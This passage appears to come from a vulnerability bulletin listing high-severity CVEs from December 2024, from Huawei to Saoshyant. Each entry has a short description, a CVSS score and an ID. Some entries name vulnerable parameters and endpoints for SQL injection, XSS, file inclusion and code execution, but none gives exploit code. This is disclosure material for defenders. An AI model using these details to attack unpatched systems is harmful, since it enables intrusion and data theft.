Huawei printers have an input verification vulnerability. Successful exploitation of this vulnerability may cause device service exceptions. (Vulnerability ID: HWPSIRT-2022-80078) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-34159.
2024-12-20
7.5
CVE-2022-34159

IBM–Cognos Analytics
IBM Cognos Analytics 11.2.0 through 11.2.4 FP4 and 12.0.0 through 12.0.4 is vulnerable to an Expression Language (EL) Injection vulnerability. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, and/or cause the server to crash when using a specially crafted EL statement.
2024-12-20
9
CVE-2024-51466

IBM–Cognos Analytics
IBM Cognos Analytics 11.2.0 through 11.2.4 FP4 and 12.0.0 through 12.0.4 could be vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. Attackers can make use of this weakness and upload malicious executable files into the system, and it can be sent to victim for performing further attacks.
2024-12-20
8
CVE-2024-40695

IBM–Security Verify Access Docker
IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges.
2024-12-19
7.8
CVE-2024-35141

Ilya Chekalskiy–Like in Vk.com
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ilya Chekalskiy Like in Vk.com allows Stored XSS.This issue affects Like in Vk.com: from n/a through 0.5.2.
2024-12-16
7.1
CVE-2024-54424

implecode–eCommerce Product Catalog Plugin for WordPress
The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the ‘customer_panel_password_reset’ function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-21
8.8
CVE-2024-12771

Iqonic Design–WPBookit
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Iqonic Design WPBookit allows SQL Injection.This issue affects WPBookit: from n/a through 1.6.0.
2024-12-16
9.3
CVE-2024-54280

ISDO Software–Web Software
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in ISDO Software Web Software allows SQL Injection.This issue affects Web Software: before 3.6.
2024-12-19
9.8
CVE-2024-10244

Ivan Ovsyannikov–Aphorismus
Cross-Site Request Forgery (CSRF) vulnerability in Ivan Ovsyannikov Aphorismus allows Stored XSS.This issue affects Aphorismus: from n/a through 1.2.0.
2024-12-16
7.1
CVE-2024-54429

Jaytesh Barange–Posts Date Ranges
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Jaytesh Barange Posts Date Ranges allows Reflected XSS.This issue affects Posts Date Ranges: from n/a through 2.2.
2024-12-16
7.1
CVE-2024-54387

Jesse Overright–Social Media Sharing
Cross-Site Request Forgery (CSRF) vulnerability in Jesse Overright Social Media Sharing allows Stored XSS.This issue affects Social Media Sharing: from n/a through 1.1.
2024-12-16
7.1
CVE-2024-54423

Jettochkin–Jet Footer Code
Cross-Site Request Forgery (CSRF) vulnerability in Jettochkin Jet Footer Code allows Stored XSS.This issue affects Jet Footer Code: from n/a through 1.4.
2024-12-16
7.1
CVE-2024-54436

John Godley–Tidy Up
Cross-Site Request Forgery (CSRF) vulnerability in John Godley Tidy Up allows Reflected XSS.This issue affects Tidy Up: from n/a through 1.3.
2024-12-16
7.1
CVE-2024-56015

Jules Colle–Advanced Options Editor
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Jules Colle Advanced Options Editor allows Reflected XSS.This issue affects Advanced Options Editor: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54249

Kyle M. Brown–WP Simple Pay Lite Manager
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Kyle M. Brown WP Simple Pay Lite Manager allows SQL Injection.This issue affects WP Simple Pay Lite Manager: from n/a through 1.4.
2024-12-16
7.6
CVE-2024-55989

launch-page-importer–LaunchPage.app Importer
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in launch-page-importer LaunchPage.app Importer allows SQL Injection.This issue affects LaunchPage.app Importer: from n/a through 1.1.
2024-12-16
9.3
CVE-2024-55977

Lenovo–Accessories and Display Manager
An improper certificate validation vulnerability was reported in LADM that could allow a network attacker with the ability to redirect an update request to a remote server and execute code with elevated privileges.
2024-12-16
8.1
CVE-2024-6001

Lenovo–Accessories and Display Manager
An improper validation vulnerability was reported in the firmware update mechanism of LADM and LDCC that could allow a local attacker to escalate privileges.
2024-12-16
7.8
CVE-2024-4762

Lenovo–FileZ Client
An improper parsing vulnerability was reported in the FileZ client that could allow a crafted file in the FileZ directory to read arbitrary files on the device due to URL preloading.
2024-12-16
7.6
CVE-2024-8058

LightFTP–LightFTP
The server lacks thread safety and can be crashed by anomalous data sent by an anonymous user from a remote network. The crash causes the FTP service to become unavailable, affecting all users and processes that rely on it for file transfers. If the crash occurs during file upload or download, it could lead to incomplete file transfers, potentially corrupting data. The repeated crash might also affect the stability of the underlying system, especially if it leads to resource leaks or affects other services.
2024-12-16
7.5
CVE-2024-11144

Linda MacPhee-Cobb–Category of Posts
Cross-Site Request Forgery (CSRF) vulnerability in Linda MacPhee-Cobb Category of Posts allows Stored XSS.This issue affects Category of Posts: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54427

LionScripts.com–LionScripts: Site Maintenance & Noindex Nofollow Plugin
Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.com LionScripts: Site Maintenance & Noindex Nofollow Plugin allows Stored XSS.This issue affects LionScripts: Site Maintenance & Noindex Nofollow Plugin: from n/a through 2.1.
2024-12-16
7.1
CVE-2024-54425

Lleidanet PKI–eSigna
Path Traversal and Insecure Direct Object Reference (IDOR) vulnerabilities in the eSignaViewer component in eSigna product versions 1.0 to 1.5 on all platforms allow an unauthenticated attacker to access arbitrary files in the document system via manipulation of file paths and object identifiers.
2024-12-20
7.5
CVE-2024-12014

Matt Walters–WordPress Filter
Cross-Site Request Forgery (CSRF) vulnerability in Matt Walters WordPress Filter allows Stored XSS.This issue affects WordPress Filter: from n/a through 1.4.1.
2024-12-16
7.1
CVE-2024-54391

MELONIQ.NET–AppMaps
Cross-Site Request Forgery (CSRF) vulnerability in MELONIQ.NET AppMaps allows Stored XSS.This issue affects AppMaps: from n/a through 1.1.
2024-12-16
7.1
CVE-2024-54400

Merrill M. Mayer–jCarousel
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Merrill M. Mayer jCarousel allows Stored XSS.This issue affects jCarousel: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54437

metagauss–EventPrime Events Calendar, Bookings and Tickets
The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the em_ticket_category_data and em_ticket_individual_data parameters in all versions up to, and including, 4.0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. Note: this vulnerability requires the "Guest Submissions" setting to be enabled. It is disabled by default.
2024-12-17
7.2
CVE-2024-12024

Micha–I Plant A Tree
Cross-Site Request Forgery (CSRF) vulnerability in Micha I Plant A Tree allows Stored XSS.This issue affects I Plant A Tree: from n/a through 1.7.3.
2024-12-16
7.1
CVE-2024-54331

Microsoft–Excel
A library injection vulnerability exists in Microsoft Excel 16.83 for macOS. A specially crafted library can leverage Excel’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-43106

Microsoft–OneNote
A library injection vulnerability exists in Microsoft OneNote 16.83 for macOS. A specially crafted library can leverage OneNote’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-41159

Microsoft–Outlook
A library injection vulnerability exists in Microsoft Outlook 16.83.3 for macOS. A specially crafted library can leverage Outlook’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-42220

Microsoft–PowerPoint
A library injection vulnerability exists in Microsoft PowerPoint 16.83 for macOS. A specially crafted library can leverage PowerPoint’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-39804

Microsoft–Teams (work or school)
A library injection vulnerability exists in the com.microsoft.teams2.modulehost.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-41138

Microsoft–Teams (work or school)
A library injection vulnerability exists in the WebView.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-41145

Microsoft–Teams (work or school)
A library injection vulnerability exists in Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-42004

Microsoft–Word
A library injection vulnerability exists in Microsoft Word 16.83 for macOS. A specially crafted library can leverage Word’s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application’s permissions.
2024-12-18
7.1
CVE-2024-41165

Midoks–WP
Cross-Site Request Forgery (CSRF) vulnerability in Midoks WP allows Stored XSS.This issue affects from n/a through 5.3.5.
2024-12-16
7.1
CVE-2024-54392

Mighty Digital–Partners
Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’) vulnerability in Mighty Digital Partners allows Object Injection.This issue affects Partners: from n/a through 0.2.0.
2024-12-18
9.8
CVE-2024-56059

Mikado-Themes–Biagiotti Membership
The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user’s identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email.
2024-12-18
9.8
CVE-2024-12287

Mike Leembruggen–Critical Site Intel
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mike Leembruggen Critical Site Intel allows SQL Injection.This issue affects Critical Site Intel: from n/a through 1.0.
2024-12-16
9.3
CVE-2024-55976

Milestone Systems–XProtect VMS
Disclosure of sensitive information in HikVision camera driver’s log file in XProtect Device Pack allows an attacker to read camera credentials stored in the Recording Server under specific conditions.
2024-12-19
7.5
CVE-2024-12569

misskey-dev–misskey
Misskey is an open source, federated social media platform. In affected versions FileServerService (media proxy) in github.com/misskey-dev/misskey 2024.10.1 or earlier did not detect proxy loops, which allows remote actors to execute a self-propagating reflected/amplified distributed denial-of-service via a maliciously crafted note. FileServerService.prototype.proxyHandler did not check incoming requests are not coming from another proxy server. An attacker can execute an amplified denial-of-service by sending a nested proxy request to the server and end the request with a malicious redirect back to another nested proxy request. Leading to unbounded recursion until the original request is timed out. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. Users unable to upgrade may configure the reverse proxy to block requests to the proxy with an empty User-Agent header or one containing Misskey/. An attacker can not effectively modify the User-Agent header without making another request to the server.
2024-12-18
7.4
CVE-2024-49363

moaluko–Store Locator for WordPress with Google Maps LotsOfLocales
The Store Locator for WordPress with Google Maps – LotsOfLocales plugin for WordPress is vulnerable to Local File Inclusion in version 3.98.9 via the ‘sl_engine’ parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
2024-12-20
9.8
CVE-2024-12571

Mobil365 Informatics–Saha365 App
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mobil365 Informatics Saha365 App allows SQL Injection.This issue affects Saha365 App: before 30.09.2024.
2024-12-17
9.8
CVE-2024-8972

Mohamed Riyaz–Admin Customization
Cross-Site Request Forgery (CSRF) vulnerability in Mohamed Riyaz Admin Customization allows Stored XSS.This issue affects Admin Customization: from n/a through 2.2.
2024-12-16
7.1
CVE-2024-54431

Molefed–tydskrif
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Molefed allows Reflected XSS.This issue affects tydskrif: from n/a through 1.1.3.
2024-12-16
7.1
CVE-2024-54257

n/a–bun
Versions of the package bun before 1.1.30 are vulnerable to Prototype Pollution due to improper input sanitization. An attacker can exploit this vulnerability through Bun’s APIs that accept objects.
2024-12-18
7.5
CVE-2024-21548

n/a–CK and SyntaxHighlighter
Cross-Site Request Forgery (CSRF) vulnerability in CK and SyntaxHighlighter allows Stored XSS.This issue affects CK and SyntaxHighlighter: from n/a through 3.4.2.
2024-12-16
7.1
CVE-2024-54407

n/a–n/a
Buffer Overflow vulnerability in radarorg radare2 v.5.8.8 allows an attacker to execute arbitrary code via the name, type, or group fields.
2024-12-17
9.8
CVE-2024-29646

n/a–n/a
Buffer Overflow vulnerability in NEXTU FLATA AX1500 Router v.1.0.2 allows a remote attacker to execute arbitrary code via the POST request handler component.
2024-12-16
9.8
CVE-2024-29671

n/a–n/a
rizin before v0.6.3 is vulnerable to Improper Neutralization of Special Elements via meta_set function in librz/analysis/meta.
2024-12-17
9.1
CVE-2024-31668

n/a–n/a
iptraf-ng 1.2.1 has a stack-based buffer overflow.
2024-12-16
9.8
CVE-2024-52949

n/a–n/a
Dante 1.4.0 through 1.4.3 (fixed in 1.4.4) has incorrect access control for some sockd.conf configurations involving socksmethod.
2024-12-17
9.1
CVE-2024-54662

n/a–n/a
GetSimple CMS CE 3.3.19 suffers from arbitrary code execution in the template editing function in the background management system, which can be used by an attacker to implement RCE.
2024-12-16
9.8
CVE-2024-55085

n/a–n/a
A vulnerability has been found in the 1000projects Bookstore Management System PHP MySQL Project 1.0. This issue affects some unknown functionality of add_company.php. Actions on the delete parameter result in SQL injection.
2024-12-17
9.1
CVE-2024-55496

n/a–n/a
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_netaction.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions.
2024-12-17
9.1
CVE-2024-55513

n/a–n/a
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_ipslib.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded.
2024-12-17
9.8
CVE-2024-55515

n/a–n/a
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 v3.90. The component affected by this issue is /upload_sysconfig.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions.
2024-12-17
9.1
CVE-2024-55516

n/a–n/a
ui/pref/ProxyPrefView.java in weasis-core in Weasis 4.5.1 has a hardcoded key for symmetric encryption of proxy credentials.
2024-12-16
9.8
CVE-2024-55557

n/a–n/a
A flaw was found in the MustGather.managed.openshift.io Custom Defined Resource (CRD) of OpenShift Dedicated. A non-privileged user on the cluster can create a MustGather object with a specially crafted file and set the most privileged service account to run the job. This can allow a standard developer user to escalate their privileges to a cluster administrator and pivot to the AWS environment.
2024-12-19
8.8
CVE-2024-25131

n/a–n/a
Improper access control in the endpoint /RoleMenuMapping/AddRoleMenu of Digiteam v4.21.0.0 allows authenticated attackers to escalate privileges.
2024-12-20
8.8
CVE-2024-37758

n/a–n/a
A Cross-Site Request Forgery (CSRF) in Sunbird DCIM dcTrack v9.1.2 allows authenticated attackers to escalate their privileges by forcing an Administrator user to perform sensitive requests in some admin screens.
2024-12-16
8
CVE-2024-37774

n/a–n/a
CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the phpSelection field to the websites/submitWebsiteCreation URI.
2024-12-16
8.8
CVE-2024-53376

n/a–n/a
GetSimple CMS CE 3.3.19 is vulnerable to Server-Side Request Forgery (SSRF) in the backend plugin module.
2024-12-18
8.8
CVE-2024-55088

n/a–n/a
Cognition Devin before 2024-12-12 provides write access to code by an attacker who discovers the https://vscode-randomly_generated_string.devinapps.com URL (aka the VSCode live share URL) for a specific "Use Devin’s Machine" session. For example, this URL may be discovered if a customer posts a screenshot of a Devin session to social media, or publicly streams their Devin session.
2024-12-16
8.1
CVE-2024-56083

n/a–n/a
In Optimizely Configured Commerce before 5.2.2408, malicious payloads can be stored and subsequently executed in users’ browsers under specific conditions: XSS from client-side template injection in search history.
2024-12-18
8.1
CVE-2024-56174

n/a–n/a
A NULL pointer dereference in D-Link DAP-1513 REVA_FIRMWARE_1.01 allows attackers to cause a Denial of Service (DoS) via a crafted web request without authentication. The vulnerability occurs in the /bin/webs binary of the firmware. When /bin/webs receives a carefully constructed HTTP request, it will crash and exit due to a null pointer reference, leading to a denial of service attack to the device.
2024-12-17
7.5
CVE-2024-36832

n/a–n/a
Incorrect access control in Sunbird DCIM dcTrack v9.1.2 allows attackers to create or update a ticket with a location which bypasses an RBAC check.
2024-12-16
7.5
CVE-2024-37775

n/a–n/a
Databricks JDBC Driver before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achieve Remote Code Execution in the context of the driver by tricking a victim into using a crafted connection URL that uses the property krbJAASFile.
2024-12-17
7.3
CVE-2024-49194

n/a–n/a
Keyfactor Command before 12.5.0 has Incorrect Access Control: access tokens are over permissioned, aka 64099. The fixed versions are 11.5.1.1, 11.5.2.1, 11.5.3.1, 11.5.4.5, 11.5.6.1, 11.6.0, 12.2.0.1, 12.3.0.1, 12.4.0.1, 12.5.0, and 24.4.0.
2024-12-18
7.6
CVE-2024-49202

n/a–n/a
An issue in H3C switch h3c-S1526 allows a remote attacker to obtain sensitive information via the S1526.cfg component.
2024-12-17
7.5
CVE-2024-51175

n/a–n/a
A SQL Injection vulnerability was found in /index.php in PHPGurukul Pre-School Enrollment System v1.0, which allows remote attackers to execute arbitrary code via the visittime parameter.
2024-12-19
7.5
CVE-2024-54790

n/a–n/a
In the GetSimple CMS CE 3.3.19 management page, Server-Side Request Forgery (SSRF) can be achieved in the plug-in download address in the backend management system.
2024-12-18
7.2
CVE-2024-55086

n/a–n/a
Online Nurse Hiring System v1.0 was discovered to contain a SQL injection vulnerability in the component /admin/profile.php via the fullname parameter.
2024-12-16
7.2
CVE-2024-55103

n/a–n/a
Online Nurse Hiring System v1.0 was discovered to contain multiple SQL injection vulnerabilities in the component /admin/add-nurse.php via the gender and emailid parameters.
2024-12-16
7.2
CVE-2024-55104

n/a–n/a
Oqtane Framework 6.0.0 is vulnerable to Incorrect Access Control. By manipulating the entityid parameter, attackers can bypass passcode validation and successfully log into the application or access restricted data without proper authorization. The lack of server-side validation exacerbates the issue, as the application relies on client-side information for authentication.
2024-12-20
7.5
CVE-2024-55470

n/a–n/a
An issue was discovered in Logpoint UniversalNormalizer before 5.7.0. Authenticated users can inject payloads while creating Universal Normalizer. These are executed, leading to Remote Code Execution.
2024-12-16
7.1
CVE-2024-56084

n/a–n/a
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads in Report Templates. These are executed when the backup process is initiated, leading to Remote Code Execution.
2024-12-16
7.1
CVE-2024-56086

n/a–n/a
A flaw was found in Open Cluster Management (OCM) when a user has access to the worker nodes which contain the cluster-manager or klusterlet deployments. The cluster-manager deployment uses a service account with the same name "cluster-manager" which is bound to a ClusterRole also named "cluster-manager", which includes the permission to create Pod resources. If this deployment runs a pod on an attacker-controlled node, the attacker can obtain the cluster-manager’s token and steal any service account token by creating and mounting the target service account to control the whole cluster.
2024-12-17
7.5
CVE-2024-9779

n/a–spatie/browsershot
Versions of the package spatie/browsershot before 5.0.2 are vulnerable to Directory Traversal due to URI normalisation in the browser where the file:// check can be bypassed with file:\\. An attacker could read any file on the server by exploiting the normalization of \ into /.
2024-12-18
7.5
CVE-2024-21547

n/a–spatie/browsershot
Versions of the package spatie/browsershot before 5.0.3 are vulnerable to Improper Input Validation due to improper URL validation through the setUrl method. An attacker can exploit this vulnerability by utilizing view-source:file://, which allows for arbitrary file reading on a local file. **Note:** This is a bypass of the fix for [CVE-2024-21544](https://security.snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-8496745).
2024-12-20
7.5
CVE-2024-21549

N/A–Spring Framework
Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.
2024-12-19
7.5
CVE-2024-38819

n/a–unisharp/laravel-filemanager
Versions of the package unisharp/laravel-filemanager before 2.9.1 are vulnerable to Remote Code Execution (RCE) through using a valid mimetype and inserting the . character after the php file extension. This allows the attacker to execute malicious code.
2024-12-18
9.8
CVE-2024-21546

Nabajit Roy–Nabz Image Gallery
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Nabajit Roy Nabz Image Gallery allows SQL Injection.This issue affects Nabz Image Gallery: from n/a through v1.00.
2024-12-16
9.3
CVE-2024-55981

Nagvis–Nagvis
Improper neutralization of input in Nagvis before version 1.9.42 which can lead to XSS
2024-12-19
8.8
CVE-2024-47093

Navdeep Kumar–Wp Login with Ajax
Cross-Site Request Forgery (CSRF) vulnerability in Navdeep Kumar Wp Login with Ajax allows Stored XSS.This issue affects Wp Login with Ajax: from n/a through 0.6.
2024-12-16
7.1
CVE-2024-54416

Nazmul Ahsan–MDC Comment Toolbar
Cross-Site Request Forgery (CSRF) vulnerability in Nazmul Ahsan MDC Comment Toolbar allows Stored XSS.This issue affects MDC Comment Toolbar: from n/a through 1.1.
2024-12-16
7.1
CVE-2024-54404

nexryai–altair
Altair is a fork of Misskey v12. Affected versions lack of request validation and lack of authentication in the image proxy for compressing and resizing remote files could allow attacks that could affect availability, such as by abnormally increasing the CPU usage of the server on which this software is running or placing a heavy load on the network it is using. This issue has been fixed in v12.24Q4.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-19
8.6
CVE-2024-56200

NI–DAQExpress
A deserialization of untrusted data vulnerability exists in NI DAQExpress that may result in remote code execution. Successful exploitation requires an attacker to get a user to open a specially crafted project file. This vulnerability affects DAQExpress 5.1 and prior versions. Â Please note that DAQExpress is an EOL product and will not receive any updates.
2024-12-18
7.8
CVE-2024-12741

nssTheme–Wp NssUser Register
Incorrect Privilege Assignment vulnerability in nssTheme Wp NssUser Register allows Privilege Escalation.This issue affects Wp NssUser Register: from n/a through 1.0.0.
2024-12-16
9.8
CVE-2024-54363

onigetoc–Add image to Post
Cross-Site Request Forgery (CSRF) vulnerability in onigetoc Add image to Post allows Stored XSS.This issue affects Add image to Post: from n/a through 0.6.
2024-12-16
7.1
CVE-2024-54428

OpenText–Privileged Access Manager
In a specific scenario a LDAP user can abuse the authentication process in OpenTextÂ Privileged Access Manager that allows authentication bypass.Â This issue affects Privileged Access Manager version 23.3(4.4); 24.3(4.5)
2024-12-19
8
CVE-2024-12111

OPPO–OPPO Store APP
In OPPO Store APP, there’s a possible escalation of privilege due to improper input validation.
2024-12-18
9.8
CVE-2024-1610

outstrip–Instant Appointment
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in outstrip Instant Appointment allows SQL Injection.This issue affects Instant Appointment: from n/a through 1.2.
2024-12-16
9.3
CVE-2024-54361

Pearlbells–Flash News / Post (Responsive)
Cross-Site Request Forgery (CSRF) vulnerability in Pearlbells Flash News / Post (Responsive) allows Privilege Escalation.This issue affects Flash News / Post (Responsive): from n/a through 4.1.
2024-12-16
9.8
CVE-2024-56012

Phoetry–phZoom
Cross-Site Request Forgery (CSRF) vulnerability in Phoetry phZoom allows Stored XSS.This issue affects phZoom: from n/a through 1.2.92.
2024-12-16
7.1
CVE-2024-54434

Phuc Pham–Multiple Admin Emails
Cross-Site Request Forgery (CSRF) vulnerability in Phuc Pham Multiple Admin Emails allows Cross Site Request Forgery.This issue affects Multiple Admin Emails: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54388

Pierre Lannoy / PerfOps One–Device Detector
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pierre Lannoy / PerfOps One Device Detector allows Reflected XSS.This issue affects Device Detector: from n/a through 4.2.0.
2024-12-18
7.1
CVE-2024-56010

Project Caruso–Flaming Forms
Cross-Site Request Forgery (CSRF) vulnerability in Project Caruso Flaming Forms allows Stored XSS.This issue affects Flaming Forms: from n/a through 1.0.1.
2024-12-16
7.1
CVE-2024-54398

QNAP Systems Inc.–QuLog Center
A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained user access to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QuLog Center 1.5.0.738 ( 2023/03/06 ) and later QuLog Center 1.4.1.691 ( 2023/03/01 ) and later QuLog Center 1.3.1.645 ( 2023/02/22 ) and later
2024-12-19
7.3
CVE-2023-23354

QNAP Systems Inc.–QVPN Windows
An insecure library loading vulnerability has been reported to affect QVPN Device Client. If exploited, the vulnerability could allow local attackers who have gained user access to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: QVPN Windows 2.0.0.1316 and later QVPN Windows 2.0.0.1310 and later
2024-12-19
7.8
CVE-2022-27595

Quietly–Quietly Insights
Missing Authorization vulnerability in Quietly Quietly Insights allows Privilege Escalation.This issue affects Quietly Insights: from n/a through 1.2.2.
2024-12-16
8.8
CVE-2024-54378

Reza Moallemi–Comments On Feed
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Reza Moallemi Comments On Feed allows Reflected XSS.This issue affects Comments On Feed: from n/a through 1.2.1.
2024-12-16
7.1
CVE-2024-54406

richteam–Share Buttons Social Media
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in richteam Share Buttons – Social Media allows Blind SQL Injection.This issue affects Share Buttons – Social Media: from n/a through 1.0.2.
2024-12-16
9.3
CVE-2024-55982

Ritesh Sanap–Advanced What should we write next about
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ritesh Sanap Advanced What should we write next about allows SQL Injection.This issue affects Advanced What should we write next about: from n/a through 1.0.3.
2024-12-16
8.5
CVE-2024-55987

robfelty–Collapsing Categories
The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the ‘taxonomy’ parameter of the /wp-json/collapsing-categories/v1/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
2024-12-18
7.5
CVE-2024-12025

Rohit Urane–Dr Affiliate
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Rohit Urane Dr Affiliate allows SQL Injection.This issue affects Dr Affiliate: from n/a through 1.2.3.
2024-12-18
8.5
CVE-2024-55975

Ruben Garza, Jr.–GitSync
Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garza, Jr. GitSync allows Code Injection.This issue affects GitSync: from n/a through 1.1.0.
2024-12-16
9.6
CVE-2024-54368

rubengc–AutomatorWP The #1 automator plugin for no-code automation in WordPress
The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘a-0-o-search_field_value’ parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin’s import and code action feature, this vulnerability can be leveraged to execute arbitrary code.
2024-12-19
9.6
CVE-2024-12626

Ryan Nystrom–TSB Occasion Editor
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ryan Nystrom TSB Occasion Editor allows SQL Injection.This issue affects TSB Occasion Editor: from n/a through 1.2.1.
2024-12-16
8.5
CVE-2024-55973

Ryan Scott–Visual Recent Posts
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ryan Scott Visual Recent Posts allows Reflected XSS.This issue affects Visual Recent Posts: from n/a through 1.2.3.
2024-12-16
7.1
CVE-2024-54403

Sabri Taieb–Sogrid
Cross-Site Request Forgery (CSRF) vulnerability in Sabri Taieb Sogrid allows Privilege Escalation.This issue affects Sogrid: from n/a through 1.5.2.
2024-12-16
8.8
CVE-2024-54352

Sabri Taieb–Sogrid
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Sabri Taieb Sogrid allows PHP Local File Inclusion.This issue affects Sogrid: from n/a through 1.5.6.
2024-12-16
7.5
CVE-2024-54374

Sabri Taieb–Woolook
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Sabri Taieb Woolook allows PHP Local File Inclusion.This issue affects Woolook: from n/a through 1.7.0.
2024-12-16
7.5
CVE-2024-54375

Sanjay Singh Negi–Floating Video Player
Cross-Site Request Forgery (CSRF) vulnerability in Sanjay Singh Negi Floating Video Player allows Stored XSS.This issue affects Floating Video Player: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54421

Saoshyant–Saoshyant Element
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Saoshyant Saoshyant Element allows Reflected XSS.This issue affects Saoshyant Element: from n/a through 1.2.
2024-12-18
7.1
CVE-2024-51646

